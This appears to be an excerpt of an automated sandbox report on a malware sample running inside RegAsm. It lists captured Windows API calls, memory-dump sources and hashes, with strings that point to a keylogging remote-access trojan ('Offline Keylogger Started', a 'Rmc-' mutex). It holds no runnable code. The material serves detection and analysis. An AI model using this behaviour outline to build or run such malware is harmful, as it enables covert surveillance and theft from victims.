                        • Part of subcall function 1000C803: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
                      Memory Dump Source
                      • Source File: 00000003.00000002.2931866265.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                      • Associated: 00000003.00000002.2931843207.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2931866265.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_10000000_RegAsm.jbxd
                      Similarity
                      • API ID: AddressHandleModuleProcProtectVirtual
                      • String ID:
                      • API String ID: 2099061454-0
                      • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                      • Instruction ID: 210348daefc771ff09e919cc38fdfa0d839c8297c2798a32150270056baeab90
                      • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                      • Instruction Fuzzy Hash: 0301D22094574A38BA51D7B40C06EBA5FD8DB176E0B24D756F1408619BDDA08906C3AE
                      APIs
                      • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0040A74D), ref: 0040A6AB
                      • GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A74D), ref: 0040A6BA
                      • Sleep.KERNEL32(00002710,?,?,?,0040A74D), ref: 0040A6E7
                      • FindCloseChangeNotification.KERNEL32(00000000,?,?,?,0040A74D), ref: 0040A6EE
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: File$ChangeCloseCreateFindNotificationSizeSleep
                      • String ID: XQG
                      • API String ID: 4068920109-3606453820
                      • Opcode ID: ed692bf81f71d99d64d0e48405d0f3cb823898ebec9c5078a7592842c921da17
                      • Instruction ID: 2d5b847f40b6dc6d65e682cb961bc0859910b41d7418e35cc132b68a4a9af338
                      • Opcode Fuzzy Hash: ed692bf81f71d99d64d0e48405d0f3cb823898ebec9c5078a7592842c921da17
                      • Instruction Fuzzy Hash: AD112B30600740EEE631A7249895A5F3B6AEB41356F48083AF2C26B6D2C6799CA0C35E
                      APIs
                      • GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 1000C860
                        • Part of subcall function 1000C7E6: GetModuleHandleA.KERNEL32(1000C7DD), ref: 1000C7E6
                        • Part of subcall function 1000C7E6: GetProcAddress.KERNEL32(00000000,1000C7F4), ref: 1000C804
                        • Part of subcall function 1000C7E6: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
                        • Part of subcall function 1000C7E6: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
                      Memory Dump Source
                      • Source File: 00000003.00000002.2931866265.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                      • Associated: 00000003.00000002.2931843207.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2931866265.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_10000000_RegAsm.jbxd
                      Similarity
                      • API ID: AddressHandleModuleProcProtectVirtual
                      • String ID:
                      • API String ID: 2099061454-0
                      • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                      • Instruction ID: abaa11d5974e3e1b05dfd32ec0224f7ddc3d76465740e120717e363e7a178845
                      • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                      • Instruction Fuzzy Hash: A921382140838A6FF711CBB44C05FA67FD8DB172E0F198696E040CB147DDA89845C3AE
                      APIs
                      • GetProcAddress.KERNEL32(00000000,1000C7F4), ref: 1000C804
                      • VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
                      • VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
                      • GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 1000C860
                      Memory Dump Source
                      • Source File: 00000003.00000002.2931866265.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                      • Associated: 00000003.00000002.2931843207.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2931866265.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_10000000_RegAsm.jbxd
                      Similarity
                      • API ID: AddressProcProtectVirtual$HandleModule
                      • String ID:
                      • API String ID: 2152742572-0
                      • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                      • Instruction ID: 9138b94afbcae90e12a8614b592989542e7cb6e8cba5f1d72008c399686a5f74
                      • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                      • Instruction Fuzzy Hash: B7F0C2619497893CFA21C7B40C45EBA5FCCCB276E0B249A56F600C718BDCA5890693FE
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: CountEventTick
                      • String ID: !D@$NG
                      • API String ID: 180926312-2721294649
                      • Opcode ID: 28a40ef79460e7d3c32c3011f81c23666305ca61cea8eed70a9cccda3992c591
                      • Instruction ID: 1740d3d485f2be3f914829e5aa2a54ae858af1ae40273f66f7ff2800e9d96298
                      • Opcode Fuzzy Hash: 28a40ef79460e7d3c32c3011f81c23666305ca61cea8eed70a9cccda3992c591
                      • Instruction Fuzzy Hash: 7E51A1316083019AC724FB32D852AEF73A5AF94314F50493FF54A671E2EF3C5949C68A
                      APIs
                      • CreateThread.KERNEL32(00000000,00000000,0040A27D,?,00000000,00000000), ref: 0040A1FE
                      • CreateThread.KERNEL32(00000000,00000000,Function_0000A267,?,00000000,00000000), ref: 0040A20E
                      • CreateThread.KERNEL32(00000000,00000000,Function_0000A289,?,00000000,00000000), ref: 0040A21A
                        • Part of subcall function 0040B164: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B172
                        • Part of subcall function 0040B164: wsprintfW.USER32 ref: 0040B1F3
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: CreateThread$LocalTimewsprintf
                      • String ID: Offline Keylogger Started
                      • API String ID: 465354869-4114347211
                      • Opcode ID: bde4462d29761b0d23c786235d2939a769aa686a4d808022a739f1360b93890e
                      • Instruction ID: bcf1cfbdc14a627f6781ea3a40f7cea6448602225ce5b2be95dc640702f6c2bd
                      • Opcode Fuzzy Hash: bde4462d29761b0d23c786235d2939a769aa686a4d808022a739f1360b93890e
                      • Instruction Fuzzy Hash: DE1194B12003187AD220B7369C86CBB765DDA8139CB00057FF946222D2EA795D54CAFB
                      APIs
                      • RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 0041377E
                      • RegSetValueExA.KERNEL32(?,004674B8,00000000,?,00000000,00000000,004752F0,?,?,0040F853,004674B8,5.1.0 Pro), ref: 004137A6
                      • RegCloseKey.KERNEL32(?,?,?,0040F853,004674B8,5.1.0 Pro), ref: 004137B1
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: CloseCreateValue
                      • String ID: pth_unenc
                      • API String ID: 1818849710-4028850238
                      • Opcode ID: 3ae23bf51bdae044d43d0241d7839713fa8c787b67a3ee745682b35b7168c146
                      • Instruction ID: c04290829ccef693e4e8b5b7d06cdf9a2950efbbd707a4c1379ff92f90edcb59
                      • Opcode Fuzzy Hash: 3ae23bf51bdae044d43d0241d7839713fa8c787b67a3ee745682b35b7168c146
                      • Instruction Fuzzy Hash: B8F06272400118FBCB009FA1DD45DEA376CEF04B51F108566FD09A61A1D7359E14DB54
                      APIs
                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,00474F50), ref: 00404DB3
                      • CreateThread.KERNEL32(00000000,00000000,?,00474EF8,00000000,00000000), ref: 00404DC7
                      • WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000), ref: 00404DD2
                      • FindCloseChangeNotification.KERNEL32(00000000,?,00000000), ref: 00404DDB
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: Create$ChangeCloseEventFindNotificationObjectSingleThreadWait
                      • String ID:
                      • API String ID: 2579639479-0
                      • Opcode ID: 028699b46d8dcb15adfbe87a9e01acdc95aa5578d040106dea6d7dbf46413c9a
                      • Instruction ID: 465453d6db43d9529954589ba2efa69a6de0eb64d520c2048147815e962fb190
                      • Opcode Fuzzy Hash: 028699b46d8dcb15adfbe87a9e01acdc95aa5578d040106dea6d7dbf46413c9a
                      • Instruction Fuzzy Hash: 3E4192B1108301AFC714EB62CD55DBFB7EDAFD4314F40093EF992A22E1DB3899098666
                      APIs
                      • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A843), ref: 0041C49E
                      • GetFileSize.KERNEL32(00000000,00000000), ref: 0041C4B2
                      • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0041C4D7
                      • FindCloseChangeNotification.KERNEL32(00000000), ref: 0041C4E5
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: File$ChangeCloseCreateFindNotificationReadSize
                      • String ID:
                      • API String ID: 2135649906-0
                      • Opcode ID: 3271d486463dfc93c477f1e2c7ad2cd28a4a76e92964f49fc02a4406d9477efd
                      • Instruction ID: d938e931a51b81dfe9e25773ede9364464a286a3a3b97e7b856b7b87d8bf29b3
                      • Opcode Fuzzy Hash: 3271d486463dfc93c477f1e2c7ad2cd28a4a76e92964f49fc02a4406d9477efd
                      • Instruction Fuzzy Hash: 0FF0C2B1245308BFE6101B25ACD4EBB375CEB867A9F00053EF902A22C1CA298C05913A
                      APIs
                      • CreateMutexA.KERNEL32(00000000,00000001,00000000,0040EC08,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,004660BC,00000003,00000000), ref: 0040D078
                      • GetLastError.KERNEL32 ref: 0040D083
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: CreateErrorLastMutex
                      • String ID: Rmc-F4JFYD
                      • API String ID: 1925916568-345995900
                      • Opcode ID: 39599091def79051ab742ff046aa9e12e6026389991bc8d246940820909dc324
                      • Instruction ID: 95155ffd2f5cf2c34283977deb482d2843c3ccfb5002447f486bda260673b364
                      • Opcode Fuzzy Hash: 39599091def79051ab742ff046aa9e12e6026389991bc8d246940820909dc324
                      • Instruction Fuzzy Hash: 18D012B0604701EBD7181770ED5975839959744702F40487AB50BD99F1CBAC88908519
                      APIs
                      • send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                      • WaitForSingleObject.KERNEL32(00000000,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474EF8,?), ref: 00404B47
                      • SetEvent.KERNEL32(00000000,?,?,00000004,?,?,00000004,?,00474EF8,?,?,?,?,?,?,0040547D), ref: 00404B75
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: EventObjectSingleWaitsend
                      • String ID:
                      • API String ID: 3963590051-0
                      • Opcode ID: 9fc3f5fbc76b769c61b094c1e0d5237dee77039eb0f94f08c61e3471faa40265
                      • Instruction ID: 83b425c638d75041f18e819343fb0b0c123ba7f8272f9a3a5816098776915250
                      • Opcode Fuzzy Hash: 9fc3f5fbc76b769c61b094c1e0d5237dee77039eb0f94f08c61e3471faa40265
                      • Instruction Fuzzy Hash: A52126B2900119BBCB04ABA1DC95DEE773CFF14314B00452BF515B21E2EE79AA15C6A4
                      APIs
                      • RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 004135CA
                      • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 004135E7
                      • RegCloseKey.KERNEL32(?), ref: 004135F2
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: CloseOpenQueryValue
                      • String ID:
                      • API String ID: 3677997916-0
                      • Opcode ID: 047bda59581c7e78827521e08e68fdf793dfebd6250409dd5ae19ad748ced965
                      • Instruction ID: 357f89d7cd1c8cc036c5e31f86fe90e90b696c4569df010e686479b524d11f87
                      • Opcode Fuzzy Hash: 047bda59581c7e78827521e08e68fdf793dfebd6250409dd5ae19ad748ced965
                      • Instruction Fuzzy Hash: 5A01D676900228BBCF209B91DC09DEF7FBDDB84751F000066BB09E2240DA748E45DBA4
                      APIs
                      • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,004752F0), ref: 00413714
                      • RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 0041372D
                      • RegCloseKey.KERNEL32(00000000), ref: 00413738
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: CloseOpenQueryValue
                      • String ID:
                      • API String ID: 3677997916-0
                      • Opcode ID: 16fdc48d36bb649990d7f6d81c9afeb312c2f40a16629baa57fa9ba92c9a975a
                      • Instruction ID: 3f277cad741e4f631881634228dfc272d65c1146f3ef4f3c344e6cfa7cb73972
                      • Opcode Fuzzy Hash: 16fdc48d36bb649990d7f6d81c9afeb312c2f40a16629baa57fa9ba92c9a975a
                      • Instruction Fuzzy Hash: 1C018BB1400229FBDF216FA1DC04DEB3F38EF05751F004065BE08621A1D6358AA5DBA4
                      APIs
                      • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 00413569
                      • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,004752F0), ref: 00413587
                      • RegCloseKey.KERNEL32(?), ref: 00413592
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: CloseOpenQueryValue
                      • String ID:
                      • API String ID: 3677997916-0
                      • Opcode ID: 1fd388fcba5a36fc4cfbdc9a361dcb97530194601f604bbc1403cef4751c10f9
                      • Instruction ID: df0ca7b2621da3f23a966dc0a7f3323316399916f3769291e5945d4ebcba47cd
                      • Opcode Fuzzy Hash: 1fd388fcba5a36fc4cfbdc9a361dcb97530194601f604bbc1403cef4751c10f9
                      • Instruction Fuzzy Hash: E8F01776900218FFDF109FA0DC05FEEBBBCEB04B11F1040A6BA09E6191E2359F54AB94
                      APIs
                      • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?,00000000,?,?,0040C19C,00466C48), ref: 00413516
                      • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?,0040C19C,00466C48), ref: 0041352A
                      • RegCloseKey.KERNEL32(?,?,?,0040C19C,00466C48), ref: 00413535
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: CloseOpenQueryValue
                      • String ID:
                      • API String ID: 3677997916-0
                      • Opcode ID: 457a1e9777394aa84a55c62b4c884cbf4b645f8070d1882d45228c3eb86b6271
                      • Instruction ID: ffaae2385a847085e6fb085aa4760e2a706d619ab1068a3de776aab9102a8dd7
                      • Opcode Fuzzy Hash: 457a1e9777394aa84a55c62b4c884cbf4b645f8070d1882d45228c3eb86b6271
                      • Instruction Fuzzy Hash: 46E06D32801238FB9F204FA2DC0DDEB7F6CEF06FA2B000155BD0DA2112E2258E50E6E4
                      APIs
                      • RegCreateKeyA.ADVAPI32(80000001,00000000,004660A4), ref: 00413885
                      • RegSetValueExA.KERNEL32(004660A4,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138A0
                      • RegCloseKey.ADVAPI32(004660A4,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138AB
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: CloseCreateValue
                      • String ID:
                      • API String ID: 1818849710-0
                      • Opcode ID: 8a000a4505fdb29c534fdcd469952580260528b50fc1865eb33bc02dff3d936a
                      • Instruction ID: 04a42b38e2882b978ed87177a7d0f50f8458418d63be9de7f69fe35b215911ab
                      • Opcode Fuzzy Hash: 8a000a4505fdb29c534fdcd469952580260528b50fc1865eb33bc02dff3d936a
                      • Instruction Fuzzy Hash: 16E06572500318FBEF115F90DC05FEA7B6CDF04B52F1045A5BF09A6191D3358E549798
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: _wcslen
                      • String ID: pQG
                      • API String ID: 176396367-3769108836
                      • Opcode ID: e8998cf28dcd9718db14c62255f57e315091e6a51e3e070f68c79c0d4cc3fbb9
                      • Instruction ID: e6961f6084f98a1e57a9a6385a58e5d20214d93246a99e64d0d6a4ea431d93e1
                      • Opcode Fuzzy Hash: e8998cf28dcd9718db14c62255f57e315091e6a51e3e070f68c79c0d4cc3fbb9
                      • Instruction Fuzzy Hash: 8111C3319002059BCB15EF65E8529EF7BB5EF54318B10013FF406A62E2EFB8AD05CB98
                      APIs
                      • GlobalMemoryStatusEx.KERNEL32(?), ref: 0041B7CA
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: GlobalMemoryStatus
                      • String ID: @
                      • API String ID: 1890195054-2766056989
                      • Opcode ID: 2ff32e62116e468e6d8a54eb6c0bfd9d688f6c12eac0596ef65494206548ed21
                      • Instruction ID: 2d2b64c70bc766df394076410504e3f9c8f669937c614d63c6700d8895b1c70c
                      • Opcode Fuzzy Hash: 2ff32e62116e468e6d8a54eb6c0bfd9d688f6c12eac0596ef65494206548ed21
                      • Instruction Fuzzy Hash: E6D017B58023189FC720DFA8E804A8DBBFCFB08210F00456AEC49E3700E770E8008B94
                      APIs
                      • _free.LIBCMT ref: 004461A6
                        • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169
                      • RtlReAllocateHeap.NTDLL(00000000,00000000,?,?,0000000F,00000000,00432F02,00000000,0000000F,0042F90C,?,?,004319B3,?,?,00000000), ref: 004461E2
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: AllocateHeap$_free
                      • String ID:
                      • API String ID: 1482568997-0
                      • Opcode ID: 0c50226df9aed064d9fc72c30ff8f5201140dd52271d3dd40973ea300b8a0024
                      • Instruction ID: bbbbf11ac8836aedddebace835184d628c0e8eb9448606daf7135ff7baabef38
                      • Opcode Fuzzy Hash: 0c50226df9aed064d9fc72c30ff8f5201140dd52271d3dd40973ea300b8a0024
                      • Instruction Fuzzy Hash: ACF0683120051566BF212A16AD01B6F375D8F83B75F17411BF91466292DE3CD911916F
                      APIs
                      • socket.WS2_32(00000002,00000001,00000006), ref: 00404852
                      • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,0040530B,?,?,00000000,00000000,?,?,00000000,00405208,?,00000000), ref: 0040488E
                        • Part of subcall function 0040489E: WSAStartup.WS2_32(00000202,00000000), ref: 004048B3
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: CreateEventStartupsocket
                      • String ID:
                      • API String ID: 1953588214-0
                      • Opcode ID: afd00016faedd330142d6470bb716eda446324a36170d88fbab64c940495e811
                      • Instruction ID: 7af5cc85a36d800a693892934b5c0b91abe86707509305098cc6d5fca1b6a633
                      • Opcode Fuzzy Hash: afd00016faedd330142d6470bb716eda446324a36170d88fbab64c940495e811
                      • Instruction Fuzzy Hash: 6E0171B1408B809ED7359F38A8456977FE0AB55304F048D6EF1DA97B91D3B5A881CB18
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 42a83028ea29ee4520479fdfd1ce509581fbe236408560bbb12e48215694f405
                      • Instruction ID: 20740d68f627359004b4f50e822579efa7e6dd26000e0d34fcfb16e84f8f3500
                      • Opcode Fuzzy Hash: 42a83028ea29ee4520479fdfd1ce509581fbe236408560bbb12e48215694f405
                      • Instruction Fuzzy Hash: 6EF0E2706042015BDB1C8B34CD60B2A36955B84315F288F3FF01AD61E0C73EC8918A0D
                      APIs
                      • GetForegroundWindow.USER32 ref: 0041BAB8
                      • GetWindowTextW.USER32(00000000,?,00000100), ref: 0041BACB
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: Window$ForegroundText
                      • String ID:
                      • API String ID: 29597999-0
                      • Opcode ID: 3324f64634fda987d6d57ad9b9c1a74d02492aa66b07baf7772615d4eb65d97a
                      • Instruction ID: 4615795adb372a642f3ed3ff298372a60f443b3219566b47796808df054d69ed
                      • Opcode Fuzzy Hash: 3324f64634fda987d6d57ad9b9c1a74d02492aa66b07baf7772615d4eb65d97a
                      • Instruction Fuzzy Hash: CCE0D875A00328A7E720A7A49C4EFE5776CEB08701F0000EEBA18D71C2EAB4AD04C7E4
                      APIs
                      • getaddrinfo.WS2_32(00000000,00000000,00000000,00472ADC,004750E4,00000000,00415188,00000000,00000001), ref: 00414F0B
                      • WSASetLastError.WS2_32(00000000), ref: 00414F10
                        • Part of subcall function 00414D86: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00414DD5
